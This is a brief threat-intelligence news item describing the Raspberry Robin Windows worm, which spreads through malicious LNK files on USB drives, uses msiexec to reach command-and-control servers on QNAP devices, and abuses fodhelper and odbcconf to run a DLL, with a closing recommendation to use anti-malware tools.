Analysts have observed a Windows malware that has worm-like capabilities and spreads via external USB drives. This malware is associated with a set of malicious activities and is tracked as Raspberry Robin.

What’s the fuss about Raspberry Robin

Raspberry Robin was first spotted in September 2021 and cybersecurity firm Sekoia tracks this malware as a QNAP worm. Recently, it was spotted in multiple customer networks in the technology and manufacturing sectors.
  • It spreads to Windows systems using an infected USB drive containing a malicious LNK file.
  • Once attached, the worm produces a new process using cmd[.]exe to execute a malicious file saved on the infected drive.
It's not known how or where Raspberry Robin infects external drives to hide activity; it may happen offline or outside of the visibility of the researchers.

Abuse of legitimate tools

The worm abuses the Microsoft Standard Installer (msiexec[.]exe) to make a connection to its C2 servers, hosted on infected QNAP devices with the use of TOR exit nodes as further C2 infrastructure.
  • Raspberry Robin uses msiexec[.]exe for external network communication to a malicious domain to communicate with C2.
  • The worm is suspected to install a malicious DLL file on infected machines to evade removal between restarts.

The use of DLL

The worm launches DLL using two genuine Windows utilities - fodhelper (managing features in Windows settings) to bypass UAC and odbcconf (configuring ODBC drivers) for executing and configuring DLL.


This report helps in providing a broader and better understanding of the threat as it offers IOCs and ATT&CK information for better tracking and detection of Raspberry Robin. Moreover, organizations are always suggested to install a reliable anti-malware solution.
Cyware Publisher